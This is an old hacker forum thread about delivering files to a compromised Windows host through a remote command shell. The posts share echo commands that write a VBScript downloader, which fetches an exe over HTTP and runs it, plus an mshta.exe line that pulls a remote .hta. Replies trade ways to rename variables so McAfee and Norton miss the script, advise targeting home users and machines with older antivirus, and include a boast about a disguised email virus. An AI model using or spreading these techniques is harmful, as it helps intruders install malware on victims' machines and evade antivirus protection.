I strongly recommend writing the exe using debug method if you are an experienced user here http://www.governmentsecurity.org/forum/in...?showtopic=7255


This way is simple and is an addition to all ways that usually failed , lots of ppl asking what i can do with a cmd shell , and the known ways may all fail , which are tftp(may timeout) , ftp (may not connect correctly to server and also needs an ftp server and u must echo ur usr and pass if it doesnt allow anon. access ) , and net share commands ( mostly blocked by all ISPs now after the rpc exploit)


This way works by echoing a vbs file , and running that vbs file downloads an exe from an http site then executes it , u may remove execution from the vbs code (do what u wanna do)

I stole that code from the known IE object data vuln, and adding echoing to it, here 's the text which should be put in the shell

This looks like a very interesting method, I'm gonna test it out and let u know how it works for me. Thanks.

very nice method
thanx

i have test it on my private pc and thats (filtered) good
nice job dude very nice

i always hoped to solve this file transfer problem , and at last i found a way and it would help all the people that have problems on how to make use of their cmd shell , and that way should work 100% , not like ftp or tftp or the net share , and problems mail/msg me @ boshcash@msn.com

Hello..

Very nice indeed. Let's see if its usefull.

Regards,
LiquidSilver

This looks verrry interesting..

Great job man.. gonna test it also!

Thanks!!

//SiGN

sweet me is going to test it

I ran it on my system (WinXP SP1) and had 2 errors (see pic).
Neverthless, the file still got downloaded.

Thanks for sharing.

well , if its an error in the last three lines , they are not required because they execute the downloaded file , so if you dont want the download to be executed after download , or u have an error at the last three lines , simply remove them so last line will be BinaryStream.SaveToFile "c:\eject.exe", adSaveCreateOverWrite , any other help mail/msg me @ boshcash@msn.com

nice one boshcosh!,

when the lovebug vbs virus thing came out i wrote a batch file that echoed the whole code and extecuted it:-)

compiled the batch file to a .com

and renamedthe whole thing subject: my new webpage
and a domain name as the .com (the file was called a .com and icon looked like a link but it was in fact the virii)

very nasty piece of work and never released it :-)

the damage it could have caused :-)



Diz UK

niccce thanks dude!

ohhhhhhhhhhh....

thats sweettt !!!

10x !!

mcafee reads it, so its quite useless

Thanks for sharing

wow thats usefull ... some unis delete tftp.exe and ftp.exe

"Mcafee reads this so its useless"

Actually i didnt test it with mcafee , but AVs like mcafee may say its a malicous script running , but do they stop it from running or just prompting , second thing is that i was trying to echo a vbs file that when runned turns into an exe and runs without downloading any file from web , but this file couldnt be echoed because it had a > sign , maybe i could find a solution but i think this way isnt bad , and again plz tell me if it just prompts u that a malicous script is running , or it stops it from running ..

And plz tell me which part is blocked the download part or the unecessary execution part

Norton blocks the IE download exploit. It says it's a trojan that it isn't because the trojan most likely was dropped in that fashion. It detects the vbs files that download after they are created and about to run.

I bypassed the malicious scripting on mcafee by recoding it so the functions look different but do the same thing. I tried doing that to a greater extents after norton blocked the code that I had and detected it as that trojan. The only time it will cease detecting is if the declaration of the XML variable is removed. I'm working on trying to get around this.

i have norton and it kept telling me it was malicious code, so i just removed the last line of the echo that ran the file, and now norton doesnt say its bad code, so it downloads hte file but you haev to run it yourself from the cmd prompt

well , i edited it to be undetected by AVs (tested with Hotmail Mcafee) , what the AV reads , is some known variables used in the IE exploit so i changed them , and also reads the execute command so i removed it all , and put it under the vbs echo code if some ppl wanna use it , any more problems/comments ?

perfect thing.. thanx for sharing m8

mm i dont know what to do , but this way may help many ppl , and if norton detects it , i dont think that all norton versions detect it , any better idea to upload a file with cmd shell , plz tell me

very nice thanks

Real nice dude! tried and worked! never thought 'bout that kind of xferring files

greetz, sky

so kewl i m goign to try it right now

very nice job !!!

Creative idea for file transfer, but the newer corporate versions of both Norton and McAfee seem to catch this (probally due to the hueristic scanning or something now available).

So look for targets running older engines in a large scale environment...or home users.

Anyone know if Sophos or Trend detects this?

-Hardcore

And as to my ABOVE COMMENT....to clarify...

ONLY TEST ON ENVIRONMENTS YOU ARE DULY AUTHORIZED....



So if you own a multinational business, an ISP, or are superintendent of a school system...have at it!!

-Hardcore

Nice post m8!!!

bosh, there's an even easier way.

create your .vbs file and save it as a .hta and then on the person's machine use:

mshta.exe http://yourfile.com/save.hta

the link to the object exploit in my .sig explains everything.

this will be useful..gonna test it and see wich AVs are still detecting it...

thanks dude

man i just read that way today before u posted this , but i am now thinking of a good way which is undetected by AVs to use this mshta download method , it another nice method to upload files to remote host via cmd shell , if u test it and bypasses AV , then plz tell me , for me i will try to work with the vbs2exe vbs files , maybe they will work but without execution on creation ..

very interesting, it's solve a lot of downloading problems, i will try i!

thats looks nice i'm gonna give that a go

i can not echo this line on remote Computer:
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
Alway when there ist "..." i can not.i only can echo: ex:
echo test>c:\test.bat
it is OK, but
echo "test">c:\test.bat
it is not OK
WHY?
I test on my Computer ,it goes. but when i use on remote computer it goesnt.
what ist the reason?
please help me!

hey great work

<- test it

thx

hi. thx for the script .. but i dunno how to execute it ...
after the "echo" stuff i got a file called "madefile.vbs" ..
how do i "execute" it ?
is it just like an exe file ..
Do i just have to "c:\madefile.vbs[ENTER]" in the shell?

thx

very nice method
Big thanx for Info

MfG
StandBy1

temptation of course vbs file is run like exe , and realloader u may have a mistake in ur echoing , if u copy the exact echo with its spaces and change what is supposed to be changed it should work fine , and its tested remotely by the way .. Maybe soon i am planning to release some document about all ways to upload files to cmd shell , since i started with tftp and net share , then i increased my knowledge to the ftp method , then i made that vbs thing , and i knew after that the mshta thing , and i did other way with echoing , but its still beta thing (has some problems , but u can echo anytext u want including signs and all ..

line 10 show errors on execute, any idea?

now i cant get out the error , but remake the code from the original one it works 100%

@boshcash
no..no..i really can not echo it.
echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False>>c:\madefile.vbs
the first 2 lines it work...but the 3. and 4.th it doesnt work.

the ip to test it i give u in ur PM.
Is there other to echo the sign "test" ?

Nice coding m8,

Testen on a local network and it did work :-)

Great

Tnx, very nice method, but it don't work always
Any FW stop it

bye

well , users having firewalls i dont suggest dealing with them with that way , i dont like to bind a cmdshell on a port i dont like

very nicely done... but has as flaws equal to the other ones... but still very nice and usefull!
THX A BuncH!!

Thanks man, great work:)

C00L ! Nice Method!